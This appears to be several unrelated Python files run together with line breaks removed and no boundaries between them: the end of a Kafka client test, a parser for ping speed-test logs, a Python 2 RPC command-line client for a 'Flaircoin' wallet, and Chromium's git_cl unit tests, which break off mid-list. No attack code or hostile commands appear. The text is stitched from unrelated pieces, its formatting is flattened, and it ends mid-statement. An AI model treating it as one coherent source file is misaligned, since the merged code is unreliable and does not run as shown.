client.get_random_node() broker = client.cluster.broker_metadata(node_id) client.cluster.add_coordinator( node_id, broker.host, broker.port, rack=None, purpose=(CoordinationType.GROUP, "")) wait_request = FetchRequest_v0( -1, # replica_id 500, # max_wait_ms 1024 * 1024, # min_bytes [(self.topic, [(0, 0, 1024)] )]) vanila_request = MetadataRequest([]) loop = get_running_loop() send_time = loop.time() long_task = create_task( client.send(node_id, wait_request) ) await asyncio.sleep(0.0001) self.assertFalse(long_task.done()) await client.send( node_id, vanila_request, group=ConnectionGroup.COORDINATION) resp_time = loop.time() self.assertFalse(long_task.done()) fetch_resp = await long_task # Check error code like resp->topics[0]->partitions[0]->error_code self.assertEqual(fetch_resp.topics[0][1][0][1], 0) # Check that vanila request actually executed after wait request self.assertLess(resp_time - send_time, 0.5)
# ------------------------------------------------------------------------ # This block checks to see if the script is being run directly, # i.e. through the command line. If it is, then it stops and exits the # program, asking the user to use these files by running the main.py # ------------------------------------------------------------------------ try: from .utils import testForMain except: from utils import testForMain testForMain(__name__) # ------------------------------------------------------------------------ # UDP.PY # # AUTHOR(S): Peter Walker pwalker@csumb.edu # Brandon Layton blayton@csumb.edu # # PURPOSE- This class will hold just an individual speed test (be it either a TCP or UDP test). # This will be where we have functions that do a lot of data analysis functions (like # standard deviation of TCP upload and download speed tests). # # VARIABLES: # ConnectionType String, represents the type of connection # TestNumber Integer, the number of this test from the original raw data file # RecieverIP String, IP of the server this test is connected to # ConnectionLoc String, represents where this test is connected to (East or West) # Times List, holds all of the individual ping times in the test # PacketsSent Integer, number of packets sent during the test # PacketsLost Integer, number of packets not received by the recipient # RTTMin Integer, RTT min recorded by the test # RTTMax Integer, RTT max recorded by the test # RTTAverage Integer, RTT average recorded by the test # isMobile Boolean, if the test was on a mobile device, the format is different # ERROR Boolean, if there was an error in the test, then this is True # ErrorMessage String, the message that will be output when str is called # short_str_method Boolean, used in SpeedTestDataStructure if the printout requested in short of long. # Default is False # # FUNCTIONS: # __init__ - Used to initialize an object of this class # INPUTS- self: reference to the object calling this method (i.e. Java's THIS) # OUTPUTS- none # # convert_Obj_To_2D - Converts this SpeedTestFile object into a 2D array, and returns the result # INPUTS- self: reference to the object calling this method (i.e. Java's THIS) # OUTPUTS- objectAs2D: the 2D array that will be returned # # __str__ - Returns a string represenation of the object # INPUTS- self: reference to the object calling this method (i.e. Java's THIS) # OUTPUTS- String, representing the attributes of the object (THIS) # ------------------------------------------------------------------------ from .utils import global_str_padding as pad; pad = pad*2 class PingTest(): # ------------------------ # Class variables ConnectionType = "PING" TestNumber = 0 RecieverIP = "UNKNOWN" ConnectionLoc = "UNKNOWN" Times = {} PacketsSent = 0 PacketsLost = 0 RTTMin = 0 RTTMax = 0 RTTAverage = 0 isMobile = True ERROR = False ErrorMessage = "" short_str_method = False # ------------------------ # DESC: Initializing class def __init__(self, dataString, testNum=0, isMobile=True, short=False): self.Times = {} self.text = dataString.split('\n') self.isMobile = isMobile self.TestNumber = testNum self.short_str_method = short #This block will declare this objects TestNumber for line in self.text: if ("Starting Test" in line) and (self.TestNumber == 0): self.TestNumber = line.split(" ")[2].split(":")[0].split("..")[0] break #END FOR #These are the two error cases I've noticed for Ping Tests if "Network is unreachable" in dataString: self.ERROR = True self.ErrorMessage = "Connection Error: Network is unreachable" return elif "Ping timed out" in dataString: self.ERROR = True self.ErrorMessage = "Connection Error: Ping Timed Out" return elif ("Quitting operations" in dataString) or ("Quitting Operations" in dataString): self.ERROR = True self.ErrorMessage = "Test quit by User." return #END IF/ELIF #Getting the Reciever IP address index = 0 pingCounter = 0 statsText = "ping statistics" if self.isMobile else "Ping statistics" pingText = "bytes from" if self.isMobile else "Reply from" pingErrors = ["Request timed out", "General failure", "host unreachable", "net unreachable" ] for line in self.text: #This test comes first so that, when we reach the statistics at the bottom, we read it, # parse it, and then break out of the loop before the other conditional are run if statsText in line: splitText = line.split(" ") for elem in splitText: if "184.72." in elem: self.RecieverIP = elem.strip() self.RecieverIP = self.RecieverIP[:-1] if not self.isMobile else self.RecieverIP break #END FOR index = self.text.index(line) break #Parse the individual ping times from the test else: pingCounter += 1 isErrorPresent = False #This checks to see if there are any error messages in the ping message. If there # was an error, the boolean isErrorPresent is made true, and the loop does not continue to # "if pingText in line", as the line will not have the information we need, and the .split() # will break. A time of 0 is inserted into self.Times as a placeholder. for error in pingErrors: if error in line: self.Times[pingCounter] = 0 isErrorPresent = True break if isErrorPresent: continue #END FOR if pingText in line: self.Times[pingCounter] = float(line.split("time=")[1].split("ms")[0].strip()) #END IF #END IF/ELSE #END FOR #Determining the Connection Location if self.RecieverIP == "184.72.222.65": self.ConnectionLoc = "East" if self.RecieverIP == "184.72.63.139": self.ConnectionLoc = "West" statsArr = self.text[index+1:] if self.isMobile: #First declare packetsLine to be the first element, and then split it by ",". # Then parse the packets sent and received, and deduce the packets lost packetsLine = statsArr[0] packetsLine = packetsLine.split(",") self.PacketsSent = float(packetsLine[0].split(" ")[0]) tempPacketsReceived = float(packetsLine[1].strip().split(" ")[0]) self.PacketsLost = self.PacketsSent - tempPacketsReceived #This try/except block is needed, as sometimes the min/avg/max numbers # are not printed out by iPerf. This happens in the case of 100% packet loss try: RTTLine = statsArr[1] RTTNums = RTTLine.split("=")[1][:-2].strip().split("/") self.RTTMin = float(RTTNums[0]) self.RTTAverage = float(RTTNums[1]) self.RTTMax = float(RTTNums[2]) except: using_defaults_of_0 = True else: #First declare packetsLine to tbe the first element, and then split it by ",". # Then parse the packets sent and lost packetsLine = statsArr[0] packetsLine = packetsLine.split(",") self.PacketsSent = float(packetsLine[0].split("=")[1].strip()) self.PacketsLost = float(packetsLine[2].split("=")[1].strip().split(" ")[0]) #This try/except block is needed, as sometimes the min/avg/max numbers # are not printed out by iPerf. This happens in the case of 100% packet loss try: RTTLine = statsArr[2] RTTLine = RTTLine.split(",") self.RTTMin = float(RTTLine[0].split("=")[1][:-2].strip()) self.RTTMax = float(RTTLine[1].split("=")[1][:-2].strip()) self.RTTAverage = float(RTTLine[2].split("=")[1][:-2].strip()) except: using_defaults_of_0 = True #END IF/ELSE #END DEF # DESC: This converts the object into a 2D representation of itself. Will return a 2D array # that will be used in the SpeedTestFile class. def convert_Obj_To_2D(self): objectAs2D = [] index = 0 objectAs2D.append(["","","Ping Sequence Num"]) #Adding the sequence numbers to correspong with the for t in range(10): objectAs2D[index].append(str(t+1)) #END FOR #These two lines set up the Test information in the array objectAs2D.append(["","","Test #" + self.TestNumber]) objectAs2D.append(["","","Ping " + self.ConnectionLoc]) objectAs2D.append(["","",""]) index +=1 #If the test has an error, then we print error. Otherwise, we array-itize the # threads and add then to the 2D array if (self.ERROR): objectAs2D[index].extend(["ERROR","ERROR","ERROR"]) return objectAs2D else: #Appending the ping Times for tIndex in self.Times: objectAs2D[index].append(self.Times[tIndex]) index += 1 #Appending the Packet information, and the RTT information objectAs2D[index].extend(["Packets Sent", self.PacketsSent, "Packets Lost", self.PacketsLost]) index += 1 objectAs2D[index].extend(["RTT Min", self.RTTMin, "RTT Avg", self.RTTAverage, "RTT Max", self.RTTMax]) #END IF/ELSE #Adding a little spacer between the tests. objectAs2D.append(["",""]) return objectAs2D #END DEF # DESC: Creating a string representation of our object def __str__(self): this_str = (pad + "Test Number: " + str(self.TestNumber) + "\n" + pad + "Connection Type: " + str(self.ConnectionType) + "\n" + pad + "Connection Location: " + str(self.ConnectionLoc) + "\n" ) if self.ERROR: this_str += pad + " ERROR: " + str(self.ErrorMessage) + "\n" else: if not self.short_str_method: #Printing the individual pings in the ping test this_str += pad + "Ping Times: " for index in self.Times: this_str += (str(index) + "=" + str(self.Times[index]) + "ms, ") this_str = this_str[:-2] + "\n" #Printing the rest of the information this_str += (pad + "Packets Sent: " + str(self.PacketsSent) + "\n" + pad + "Packets Lost: " + str(self.PacketsLost) + "\n" + pad + "Round Trip Time Minimum: " + str(self.RTTMin) + "\n" + pad + "Round Trip Time Maximum: " + str(self.RTTMax) + "\n" + pad + "Round Trip Time Average: " + str(self.RTTAverage) + "\n" ) else: this_str += (pad + "Packet Loss Percentage: " + str(self.PacketsLost/self.PacketsSent) + "%\n" + pad + "Round Trip Time Average: " + str(self.RTTAverage) + "\n" ) #END IF/ELSE #END IF/ELSE return this_str #END DEF #END CLASS
from jsonrpc import ServiceProxy import sys import string # ===== BEGIN USER SETTINGS ===== # if you do not set these you will be prompted for a password for every command rpcuser = "" rpcpass = "" # ====== END USER SETTINGS ====== if rpcpass == "": access = ServiceProxy("http://127.0.0.1:11555") else: access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:11555") cmd = sys.argv[1].lower() if cmd == "backupwallet": try: path = raw_input("Enter destination path/filename: ") print access.backupwallet(path) except: print "\n---An error occurred---\n" elif cmd == "getaccount": try: addr = raw_input("Enter a Flaircoin address: ") print access.getaccount(addr) except: print "\n---An error occurred---\n" elif cmd == "getaccountaddress": try: acct = raw_input("Enter an account name: ") print access.getaccountaddress(acct) except: print "\n---An error occurred---\n" elif cmd == "getaddressesbyaccount": try: acct = raw_input("Enter an account name: ") print access.getaddressesbyaccount(acct) except: print "\n---An error occurred---\n" elif cmd == "getbalance": try: acct = raw_input("Enter an account (optional): ") mc = raw_input("Minimum confirmations (optional): ") try: print access.getbalance(acct, mc) except: print access.getbalance() except: print "\n---An error occurred---\n" elif cmd == "getblockbycount": try: height = raw_input("Height: ") print access.getblockbycount(height) except: print "\n---An error occurred---\n" elif cmd == "getblockcount": try: print access.getblockcount() except: print "\n---An error occurred---\n" elif cmd == "getblocknumber": try: print access.getblocknumber() except: print "\n---An error occurred---\n" elif cmd == "getconnectioncount": try: print access.getconnectioncount() except: print "\n---An error occurred---\n" elif cmd == "getdifficulty": try: print access.getdifficulty() except: print "\n---An error occurred---\n" elif cmd == "getgenerate": try: print access.getgenerate() except: print "\n---An error occurred---\n" elif cmd == "gethashespersec": try: print access.gethashespersec() except: print "\n---An error occurred---\n" elif cmd == "getinfo": try: print access.getinfo() except: print "\n---An error occurred---\n" elif cmd == "getnewaddress": try: acct = raw_input("Enter an account name: ") try: print access.getnewaddress(acct) except: print access.getnewaddress() except: print "\n---An error occurred---\n" elif cmd == "getreceivedbyaccount": try: acct = raw_input("Enter an account (optional): ") mc = raw_input("Minimum confirmations (optional): ") try: print access.getreceivedbyaccount(acct, mc) except: print access.getreceivedbyaccount() except: print "\n---An error occurred---\n" elif cmd == "getreceivedbyaddress": try: addr = raw_input("Enter a Flaircoin address (optional): ") mc = raw_input("Minimum confirmations (optional): ") try: print access.getreceivedbyaddress(addr, mc) except: print access.getreceivedbyaddress() except: print "\n---An error occurred---\n" elif cmd == "gettransaction": try: txid = raw_input("Enter a transaction ID: ") print access.gettransaction(txid) except: print "\n---An error occurred---\n" elif cmd == "getwork": try: data = raw_input("Data (optional): ") try: print access.gettransaction(data) except: print access.gettransaction() except: print "\n---An error occurred---\n" elif cmd == "help": try: cmd = raw_input("Command (optional): ") try: print access.help(cmd) except: print access.help() except: print "\n---An error occurred---\n" elif cmd == "listaccounts": try: mc = raw_input("Minimum confirmations (optional): ") try: print access.listaccounts(mc) except: print access.listaccounts() except: print "\n---An error occurred---\n" elif cmd == "listreceivedbyaccount": try: mc = raw_input("Minimum confirmations (optional): ") incemp = raw_input("Include empty? (true/false, optional): ") try: print access.listreceivedbyaccount(mc, incemp) except: print access.listreceivedbyaccount() except: print "\n---An error occurred---\n" elif cmd == "listreceivedbyaddress": try: mc = raw_input("Minimum confirmations (optional): ") incemp = raw_input("Include empty? (true/false, optional): ") try: print access.listreceivedbyaddress(mc, incemp) except: print access.listreceivedbyaddress() except: print "\n---An error occurred---\n" elif cmd == "listtransactions": try: acct = raw_input("Account (optional): ") count = raw_input("Number of transactions (optional): ") frm = raw_input("Skip (optional):") try: print access.listtransactions(acct, count, frm) except: print access.listtransactions() except: print "\n---An error occurred---\n" elif cmd == "move": try: frm = raw_input("From: ") to = raw_input("To: ") amt = raw_input("Amount:") mc = raw_input("Minimum confirmations (optional): ") comment = raw_input("Comment (optional): ") try: print access.move(frm, to, amt, mc, comment) except: print access.move(frm, to, amt) except: print "\n---An error occurred---\n" elif cmd == "sendfrom": try: frm = raw_input("From: ") to = raw_input("To: ") amt = raw_input("Amount:") mc = raw_input("Minimum confirmations (optional): ") comment = raw_input("Comment (optional): ") commentto = raw_input("Comment-to (optional): ") try: print access.sendfrom(frm, to, amt, mc, comment, commentto) except: print access.sendfrom(frm, to, amt) except: print "\n---An error occurred---\n" elif cmd == "sendmany": try: frm = raw_input("From: ") to = raw_input("To (in format address1:amount1,address2:amount2,...): ") mc = raw_input("Minimum confirmations (optional): ") comment = raw_input("Comment (optional): ") try: print access.sendmany(frm,to,mc,comment) except: print access.sendmany(frm,to) except: print "\n---An error occurred---\n" elif cmd == "sendtoaddress": try: to = raw_input("To (in format address1:amount1,address2:amount2,...): ") amt = raw_input("Amount:") comment = raw_input("Comment (optional): ") commentto = raw_input("Comment-to (optional): ") try: print access.sendtoaddress(to,amt,comment,commentto) except: print access.sendtoaddress(to,amt) except: print "\n---An error occurred---\n" elif cmd == "setaccount": try: addr = raw_input("Address: ") acct = raw_input("Account:") print access.setaccount(addr,acct) except: print "\n---An error occurred---\n" elif cmd == "setgenerate": try: gen= raw_input("Generate? (true/false): ") cpus = raw_input("Max processors/cores (-1 for unlimited, optional):") try: print access.setgenerate(gen, cpus) except: print access.setgenerate(gen) except: print "\n---An error occurred---\n" elif cmd == "settxfee": try: amt = raw_input("Amount:") print access.settxfee(amt) except: print "\n---An error occurred---\n" elif cmd == "stop": try: print access.stop() except: print "\n---An error occurred---\n" elif cmd == "validateaddress": try: addr = raw_input("Address: ") print access.validateaddress(addr) except: print "\n---An error occurred---\n" elif cmd == "walletpassphrase": try: pwd = raw_input("Enter wallet passphrase: ") access.walletpassphrase(pwd, 60) print "\n---Wallet unlocked---\n" except: print "\n---An error occurred---\n" elif cmd == "walletpassphrasechange": try: pwd = raw_input("Enter old wallet passphrase: ") pwd2 = raw_input("Enter new wallet passphrase: ") access.walletpassphrasechange(pwd, pwd2) print print "\n---Passphrase changed---\n" except: print print "\n---An error occurred---\n" print else: print "Command not found or not supported"
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Unit tests for git_cl.py.""" import os import StringIO import stat import sys import unittest import re sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from testing_support.auto_stub import TestCase import git_cl import git_common import subprocess2 import presubmit_support class PresubmitMock(object): def __init__(self, *args, **kwargs): self.reviewers = [] @staticmethod def should_continue(): return True class RietveldMock(object): def __init__(self, *args, **kwargs): pass @staticmethod def get_description(issue): return 'Issue: %d' % issue @staticmethod def get_issue_properties(_issue, _messages): return { 'reviewers': ['joe@chromium.org', 'john@chromium.org'], 'messages': [ { 'approval': True, 'sender': 'john@chromium.org', }, ], } class WatchlistsMock(object): def __init__(self, _): pass @staticmethod def GetWatchersForPaths(_): return ['joe@example.com'] class CodereviewSettingsFileMock(object): def __init__(self): pass # pylint: disable=R0201 def read(self): return ("CODE_REVIEW_SERVER: gerrit.chromium.org\n" + "GERRIT_HOST: gerrit.chromium.org\n" + "GERRIT_PORT: 29418\n") class TestGitCl(TestCase): def setUp(self): super(TestGitCl, self).setUp() self.calls = [] self._calls_done = 0 self.mock(subprocess2, 'call', self._mocked_call) self.mock(subprocess2, 'check_call', self._mocked_call) self.mock(subprocess2, 'check_output', self._mocked_call) self.mock(subprocess2, 'communicate', self._mocked_call) self.mock(subprocess2, 'Popen', self._mocked_call) self.mock(git_common, 'get_or_create_merge_base', lambda *a: ( self._mocked_call(['get_or_create_merge_base']+list(a)))) self.mock(git_cl, 'FindCodereviewSettingsFile', lambda: '') self.mock(git_cl, 'ask_for_data', self._mocked_call) self.mock(git_cl.breakpad, 'post', self._mocked_call) self.mock(git_cl.breakpad, 'SendStack', self._mocked_call) self.mock(git_cl.presubmit_support, 'DoPresubmitChecks', PresubmitMock) self.mock(git_cl.rietveld, 'Rietveld', RietveldMock) self.mock(git_cl.rietveld, 'CachingRietveld', RietveldMock) self.mock(git_cl.upload, 'RealMain', self.fail) self.mock(git_cl.watchlists, 'Watchlists', WatchlistsMock) # It's important to reset settings to not have inter-tests interference. git_cl.settings = None def tearDown(self): if not self.has_failed(): self.assertEquals([], self.calls) super(TestGitCl, self).tearDown() def _mocked_call(self, *args, **_kwargs): self.assertTrue( self.calls, '@%d Expected: <Missing> Actual: %r' % (self._calls_done, args)) expected_args, result = self.calls.pop(0) # Also logs otherwise it could get caught in a try/finally and be hard to # diagnose. if expected_args != args: msg = '@%d Expected: %r Actual: %r' % ( self._calls_done, expected_args, args) git_cl.logging.error(msg) self.fail(msg) self._calls_done += 1 return result @classmethod def _upload_calls(cls, similarity, find_copies, private): return (cls._git_base_calls(similarity, find_copies) + cls._git_upload_calls(private)) @classmethod def _upload_no_rev_calls(cls, similarity, find_copies): return (cls._git_base_calls(similarity, find_copies) + cls._git_upload_no_rev_calls()) @classmethod def _git_base_calls(cls, similarity, find_copies): if similarity is None: similarity = '50' similarity_call = ((['git', 'config', '--int', '--get', 'branch.master.git-cl-similarity'],), '') else: similarity_call = ((['git', 'config', '--int', 'branch.master.git-cl-similarity', similarity],), '') if find_copies is None: find_copies = True find_copies_call = ((['git', 'config', '--int', '--get', 'branch.master.git-find-copies'],), '') else: val = str(int(find_copies)) find_copies_call = ((['git', 'config', '--int', 'branch.master.git-find-copies', val],), '') if find_copies: stat_call = ((['git', 'diff', '--no-ext-diff', '--stat', '--find-copies-harder', '-l100000', '-C'+similarity, 'fake_ancestor_sha', 'HEAD'],), '+dat') else: stat_call = ((['git', 'diff', '--no-ext-diff', '--stat', '-M'+similarity, 'fake_ancestor_sha', 'HEAD'],), '+dat') return [ ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server'],), 'codereview.example.com'), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), similarity_call, ((['git', 'symbolic-ref', 'HEAD'],), 'master'), find_copies_call, ((['git', 'update-index', '--refresh', '-q'],), ''), ((['git', 'diff-index', '--name-status', 'HEAD'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', 'branch.master.merge'],), 'master'), ((['git', 'config', 'branch.master.remote'],), 'origin'), ((['get_or_create_merge_base', 'master', 'master'],), 'fake_ancestor_sha'), ] + cls._git_sanity_checks('fake_ancestor_sha', 'master') + [ ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'rev-parse', 'HEAD'],), '12345'), ((['git', 'diff', '--name-status', '--no-renames', '-r', 'fake_ancestor_sha...', '.'],), 'M\t.gitignore\n'), ((['git', 'config', 'branch.master.rietveldissue'],), ''), ((['git', 'config', 'branch.master.rietveldpatchset'],), ''), ((['git', 'log', '--pretty=format:%s%n%n%b', 'fake_ancestor_sha...'],), 'foo'), ((['git', 'config', 'user.email'],), 'me@example.com'), stat_call, ((['git', 'config', 'gerrit.host'],), ''), ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), 'desc\n'), ((['git', 'config', 'rietveld.bug-prefix'],), ''), ] @classmethod def _git_upload_no_rev_calls(cls): return [ ((['git', 'config', 'core.editor'],), ''), ] @classmethod def _git_upload_calls(cls, private): if private: cc_call = [] private_call = [] else: cc_call = [((['git', 'config', 'rietveld.cc'],), '')] private_call = [ ((['git', 'config', 'rietveld.private'],), '')] return [ ((['git', 'config', 'core.editor'],), ''), ] + cc_call + private_call + [ ((['git', 'config', 'branch.master.base-url'],), ''), ((['git', 'config', '--local', '--get-regexp', '^svn-remote\\.'],), (('', None), 0)), ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'svn', 'info'],), ''), ((['git', 'config', 'rietveld.project'],), ''), ((['git', 'config', 'branch.master.rietveldissue', '1'],), ''), ((['git', 'config', 'branch.master.rietveldserver', 'https://codereview.example.com'],), ''), ((['git', 'config', 'branch.master.rietveldpatchset', '2'],), ''), ((['git', 'rev-parse', 'HEAD'],), 'hash'), ((['git', 'symbolic-ref', 'HEAD'],), 'hash'), ((['git', 'config', 'branch.hash.last-upload-hash', 'hash'],), ''), ] @staticmethod def _git_sanity_checks(diff_base, working_branch): fake_ancestor = 'fake_ancestor' fake_cl = 'fake_cl_for_patch' return [ # Calls to verify branch point is ancestor ((['git', 'rev-parse', '--verify', diff_base],), fake_ancestor), ((['git', 'merge-base', fake_ancestor, 'HEAD'],), fake_ancestor), ((['git', 'rev-list', '^' + fake_ancestor, 'HEAD'],), fake_cl), # Mock a config miss (error code 1) ((['git', 'config', 'gitcl.remotebranch'],), (('', None), 1)), # Call to GetRemoteBranch() ((['git', 'config', 'branch.%s.merge' % working_branch],), 'refs/heads/master'), ((['git', 'config', 'branch.%s.remote' % working_branch],), 'origin'), ((['git', 'rev-list', '^' + fake_ancestor, 'refs/remotes/origin/master'],), ''), ] @classmethod def _dcommit_calls_1(cls): return [ ((['git', 'config', '--local', '--get-regexp', '^svn-remote\\.'],), ((('svn-remote.svn.url svn://svn.chromium.org/chrome\n' 'svn-remote.svn.fetch trunk/src:refs/remotes/origin/master'), None), 0)), ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server'],), 'codereview.example.com'), ((['git', 'symbolic-ref', 'HEAD'],), 'refs/heads/working'), ((['git', 'config', '--int', '--get', 'branch.working.git-cl-similarity'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'refs/heads/working'), ((['git', 'config', '--int', '--get', 'branch.working.git-find-copies'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'refs/heads/working'), ((['git', 'config', 'branch.working.merge'],), 'refs/heads/master'), ((['git', 'config', 'branch.working.remote'],), 'origin'), ((['git', 'config', 'branch.working.merge'],), 'refs/heads/master'), ((['git', 'config', 'branch.working.remote'],), 'origin'), ((['git', 'rev-list', '--merges', '--grep=^SVN changes up to revision [0-9]*$', 'refs/remotes/origin/master^!'],), ''), ((['git', 'update-index', '--refresh', '-q'],), ''), ((['git', 'diff-index', '--name-status', 'HEAD'],), ''), ((['git', 'rev-list', '^refs/heads/working', 'refs/remotes/origin/master'],), ''), ((['git', 'log', '--grep=^git-svn-id:', '-1', '--pretty=format:%H'],), '3fc18b62c4966193eb435baabe2d18a3810ec82e'), ((['git', 'rev-list', '^3fc18b62c4966193eb435baabe2d18a3810ec82e', 'refs/remotes/origin/master'],), ''), ((['git', 'merge-base', 'refs/remotes/origin/master', 'HEAD'],), 'fake_ancestor_sha'), ] @classmethod def _dcommit_calls_normal(cls): return [ ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'rev-parse', 'HEAD'],), '00ff397798ea57439712ed7e04ab96e13969ef40'), ((['git', 'diff', '--name-status', '--no-renames', '-r', 'fake_ancestor_sha...', '.'],), 'M\tPRESUBMIT.py'), ((['git', 'config', 'branch.working.rietveldissue'],), '12345'), ((['git', 'config', 'branch.working.rietveldpatchset'],), '31137'), ((['git', 'config', 'branch.working.rietveldserver'],), 'codereview.example.com'), ((['git', 'config', 'user.email'],), 'author@example.com'), ((['git', 'config', 'rietveld.tree-status-url'],), ''), ] @classmethod def _dcommit_calls_bypassed(cls): return [ ((['git', 'config', 'branch.working.rietveldissue'],), '12345'), ((['git', 'config', 'branch.working.rietveldserver'],), 'codereview.example.com'), ((['git', 'config', 'rietveld.tree-status-url'],), ''), (('GitClHooksBypassedCommit', 'Issue https://codereview.example.com/12345 bypassed hook when ' 'committing (tree status was "unset")'), None), ] @classmethod def _dcommit_calls_3(cls): return [ ((['git', 'diff', '--no-ext-diff', '--stat', '--find-copies-harder', '-l100000', '-C50', 'fake_ancestor_sha', 'refs/heads/working'],), (' PRESUBMIT.py | 2 +-\n' ' 1 files changed, 1 insertions(+), 1 deletions(-)\n')), (('About to commit; enter to confirm.',), None), ((['git', 'show-ref', '--quiet', '--verify', 'refs/heads/git-cl-commit'],), (('', None), 0)), ((['git', 'branch', '-D', 'git-cl-commit'],), ''), ((['git', 'show-ref', '--quiet', '--verify', 'refs/heads/git-cl-cherry-pick'],), ''), ((['git', 'rev-parse', '--show-cdup'],), '\n'), ((['git', 'checkout', '-q', '-b', 'git-cl-commit'],), ''), ((['git', 'reset', '--soft', 'fake_ancestor_sha'],), ''), ((['git', 'commit', '-m', 'Issue: 12345\n\nR=john@chromium.org\n\n' 'Review URL: https://codereview.example.com/12345'],), ''), ((['git', 'svn', 'dcommit', '-C50', '--no-rebase', '--rmdir'],), (('', None), 0)), ((['git', 'checkout', '-q', 'working'],), ''), ((['git', 'branch', '-D', 'git-cl-commit'],), ''), ] @staticmethod def _cmd_line(description, args, similarity, find_copies, private): """Returns the upload command line passed to upload.RealMain().""" return [ 'upload', '--assume_yes', '--server', 'https://codereview.example.com', '--message', description ] + args + [ '--cc', 'joe@example.com', ] + (['--private'] if private else []) + [ '--git_similarity', similarity or '50' ] + (['--git_no_find_copies'] if find_copies == False else []) + [ 'fake_ancestor_sha', 'HEAD' ] def _run_reviewer_test( self, upload_args, expected_description, returned_description, final_description, reviewers, private=False): """Generic reviewer test framework.""" try: similarity = upload_args[upload_args.index('--similarity')+1] except ValueError: similarity = None if '--find-copies' in upload_args: find_copies = True elif '--no-find-copies' in upload_args: find_copies = False else: find_copies = None private = '--private' in upload_args self.calls = self._upload_calls(similarity, find_copies, private) def RunEditor(desc, _, **kwargs): self.assertEquals( '# Enter a description of the change.\n' '# This will be displayed on the codereview site.\n' '# The first line will also be used as the subject of the review.\n' '#--------------------This line is 72 characters long' '--------------------\n' + expected_description, desc) return returned_description self.mock(git_cl.gclient_utils, 'RunEditor', RunEditor) def check_upload(args): cmd_line = self._cmd_line(final_description, reviewers, similarity, find_copies, private) self.assertEquals(cmd_line, args) return 1, 2 self.mock(git_cl.upload, 'RealMain', check_upload) git_cl.main(['upload'] + upload_args) def test_no_reviewer(self): self._run_reviewer_test( [], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=', 'desc\n\nBUG=', []) def test_keep_similarity(self): self._run_reviewer_test( ['--similarity', '70'], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=', 'desc\n\nBUG=', []) def test_keep_find_copies(self): self._run_reviewer_test( ['--no-find-copies'], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=\n', 'desc\n\nBUG=', []) def test_private(self): self._run_reviewer_test( ['--private'], 'desc\n\nBUG=', '# Blah blah comment.\ndesc\n\nBUG=\n', 'desc\n\nBUG=', []) def test_reviewers_cmd_line(self): # Reviewer is passed as-is description = 'desc\n\nR=foo@example.com\nBUG=' self._run_reviewer_test( ['-r' 'foo@example.com'], description, '\n%s\n' % description, description, ['--reviewers=foo@example.com']) def test_reviewer_tbr_overriden(self): # Reviewer is overriden with TBR # Also verifies the regexp work without a trailing LF description = 'Foo Bar\n\nTBR=reviewer@example.com' self._run_reviewer_test( ['-r' 'foo@example.com'], 'desc\n\nR=foo@example.com\nBUG=', description.strip('\n'), description, ['--reviewers=reviewer@example.com']) def test_reviewer_multiple(self): # Handles multiple R= or TBR= lines. description = ( 'Foo Bar\nTBR=reviewer@example.com\nBUG=\nR=another@example.com') self._run_reviewer_test( [], 'desc\n\nBUG=', description, description, ['--reviewers=another@example.com,reviewer@example.com']) def test_reviewer_send_mail(self): # --send-mail can be used without -r if R= is used description = 'Foo Bar\nR=reviewer@example.com' self._run_reviewer_test( ['--send-mail'], 'desc\n\nBUG=', description.strip('\n'), description, ['--reviewers=reviewer@example.com', '--send_mail']) def test_reviewer_send_mail_no_rev(self): # Fails without a reviewer. stdout = StringIO.StringIO() stderr = StringIO.StringIO() try: self.calls = self._upload_no_rev_calls(None, None) def RunEditor(desc, _, **kwargs): return desc self.mock(git_cl.gclient_utils, 'RunEditor', RunEditor) self.mock(sys, 'stdout', stdout) self.mock(sys, 'stderr', stderr) git_cl.main(['upload', '--send-mail']) self.fail() except SystemExit: self.assertEqual( 'Using 50% similarity for rename/copy detection. Override with ' '--similarity.\n', stdout.getvalue()) self.assertEqual( 'Must specify reviewers to send email.\n', stderr.getvalue()) def test_dcommit(self): self.calls = ( self._dcommit_calls_1() + self._git_sanity_checks('fake_ancestor_sha', 'working') + self._dcommit_calls_normal() + self._dcommit_calls_3()) git_cl.main(['dcommit']) def test_dcommit_bypass_hooks(self): self.calls = ( self._dcommit_calls_1() + self._dcommit_calls_bypassed() + self._dcommit_calls_3()) git_cl.main(['dcommit', '--bypass-hooks']) @classmethod def _gerrit_base_calls(cls): return [ ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server'],), 'codereview.example.com'), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', '--int', '--get', 'branch.master.git-cl-similarity'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', '--int', '--get', 'branch.master.git-find-copies'],), ''), ((['git', 'update-index', '--refresh', '-q'],), ''), ((['git', 'diff-index', '--name-status', 'HEAD'],), ''), ((['git', 'symbolic-ref', 'HEAD'],), 'master'), ((['git', 'config', 'branch.master.merge'],), 'master'), ((['git', 'config', 'branch.master.remote'],), 'origin'), ((['get_or_create_merge_base', 'master', 'master'],), 'fake_ancestor_sha'), ] + cls._git_sanity_checks('fake_ancestor_sha', 'master') + [ ((['git', 'rev-parse', '--show-cdup'],), ''), ((['git', 'rev-parse', 'HEAD'],), '12345'), ((['git', 'diff', '--name-status', '--no-renames', '-r', 'fake_ancestor_sha...', '.'],), 'M\t.gitignore\n'), ((['git', 'config', 'branch.master.rietveldissue'],), ''), ((['git', 'config', 'branch.master.rietveldpatchset'],), ''), ((['git', 